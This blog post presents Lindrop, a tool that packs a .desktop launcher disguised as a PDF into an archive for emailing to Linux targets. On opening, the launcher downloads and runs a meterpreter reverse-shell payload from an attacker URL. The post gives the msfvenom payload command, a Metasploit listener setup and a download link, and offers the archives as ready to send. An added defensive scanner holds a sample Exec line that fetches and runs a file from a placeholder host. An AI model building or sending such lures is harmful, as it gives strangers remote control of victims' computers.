10/15/2016
Lindrop - A Social Engineering Vector for Linux Targets

A quick/dirty Python utility that generates a zip archive containing a “malicious” .desktop (aka shortcut) file that masquerades as a PDF file (not really, sort of). This is probably nothing new, but I needed a way to specifically target Linux users for certain social engineering engagements, where I could send a zip and/or tar.gz file via email, and generate something on-the-fly. So I came up with this quick mess of a tool.

It basically exploits the “Exec” section of a .desktop file to:

1. Download a PDF and display it to the user.
2. Download and execute a linux/x86/meterpreter/reverse_tcp payload.

There’s some really old-school basic obfuscation involved in the creation of the .desktop file. For one, the file name is generated with spaces between the .pdf and .desktop extensions. This is to obfuscate the actual file extension when the archive is just straight-up opened in Archive Manager.

Second, there are a bunch of newlines in the actual .desktop file itself, so if it is double-clicked from inside Archive Manager, unless you scroll all the way down, there’s nothing too obvious (aside from the fact it’s actually not a PDF!).

Another thing to note here…the “Icon” section. This contains a reference to a local SVG file which gives the .desktop shortcut an icon. In this case, we’re using an icon that’s typically included with gnome and associated to PDF files. If this SVG file doesn’t exist on the target system, then the file will look like an executable, blowing its amazing cover story of being a PDF file.
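From the defender's side, the three tricks described above (spaces padding the real .desktop extension, newline padding before the interesting lines, and a document icon on what is really a launcher) are all easy to check for before an archive reaches a user. The following is an added example, not part of Lindrop or this post: it builds a constructed sample archive with a placeholder host (example.invalid) and scans each .desktop member for those indicators plus an Exec line that fetches and runs a file.

```python
import io
import re
import zipfile

# Constructed sample .desktop that uses the tricks described in the post:
# a PDF icon on a launcher, ~200 blank lines of padding, and an Exec that
# downloads something to /tmp and runs it. The host is a placeholder.
_DESKTOP = (
    "[Desktop Entry]\nType=Application\nName=survey\n"
    "Icon=/usr/share/icons/gnome/scalable/mimetypes/application-pdf.svg\n"
    + "\n" * 200
    + "Exec=sh -c 'wget -q http://example.invalid/payload -O /tmp/pl892"
    " && chmod +x /tmp/pl892 && /tmp/pl892'\n"
)

def build_sample_zip() -> bytes:
    """Constructed archive: one padded-name .desktop plus a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("survey.pdf                    .desktop", _DESKTOP)
        zf.writestr("readme.txt", "nothing to see\n")
    return buf.getvalue()

# Indicators: "<doc ext><whitespace>.desktop", fetch-then-run Exec, document icon
DOUBLE_EXT = re.compile(r"\.(pdf|doc|docx|txt|jpg|png)\s+\.desktop$", re.I)
FETCH_AND_RUN = re.compile(r"\b(wget|curl)\b.*\b(chmod|sh|bash)\b", re.I)
DOC_ICON = re.compile(r"(application-pdf|x-office-document|mimetypes)", re.I)

def scan_zip(data: bytes) -> dict:
    """Return {member_name: [indicator, ...]} for every .desktop member found."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not name.lower().rstrip().endswith(".desktop"):
                continue
            hits = []
            if DOUBLE_EXT.search(name):
                hits.append("padded double extension")
            lines = zf.read(info).decode("utf-8", "replace").splitlines()
            blank = sum(1 for line in lines if not line.strip())
            if blank > 50:
                hits.append(f"{blank} blank lines of padding")
            for line in lines:
                if line.startswith("Exec=") and FETCH_AND_RUN.search(line):
                    hits.append("Exec downloads and runs a file")
                elif line.startswith("Icon=") and DOC_ICON.search(line):
                    hits.append("document icon on a launcher")
            findings[name] = hits
    return findings
```

The same checks can be run by a mail gateway on tar.gz members; the member name and contents are the only inputs needed.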

Anyway…on to the tool…

Lindrop takes 4 inputs:

1. An output name for the “PDF” (.desktop) file that will be in the zip.

2. An output name for the archive file.

3. A remote payload URL (e.g., http://www.attacker.com/payload). This will be downloaded to the /tmp directory on the target box. For this example, we’re simply creating a payload with msfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload

4. A remote PDF to download and display to the user. In the case of this example, we’re remotely loading Blackhat 2016’s Attendee survey: https://www.blackhat.com/docs/us-16/2016-Black-Hat-Attendee-Survey.pdf

Behind the scenes, Xpdf is used to open the PDF file.

You should end up with a zip and a tar.gz file, either of which is ready to send to your target.

Extracting the contents gives us a nice little quasi-“PDF” file.

Executing the file, from the perspective of the target, opens up (using Xpdf) the Blackhat PDF (or resume, or whichever PDF you tell it to download/open up).

On the attacker side, we have a listener up using the following resource file in metasploit, waiting for a connection from the payload the .desktop file has downloaded, and that we generated previously with msfvenom:

use exploit/multi/handler
set ExitOnSession false
set LHOST 0.0.0.0
set LPORT 6666
set PAYLOAD linux/x86/meterpreter/reverse_tcp
exploit -j

This was all tested in the latest Kali Rolling, but will probably work on most distros that handle .desktop files the same way. This code is probably buggy (won’t take spaces in any of the inputs, and probably other minor problems) and I’m sure could be improved. At the moment, it just drops a “pl892” payload in the /tmp directory (change that), along with the remote PDF file downloaded to /tmp/temp.pdf.

You can download lindrop here: lindrop.py

Enjoy!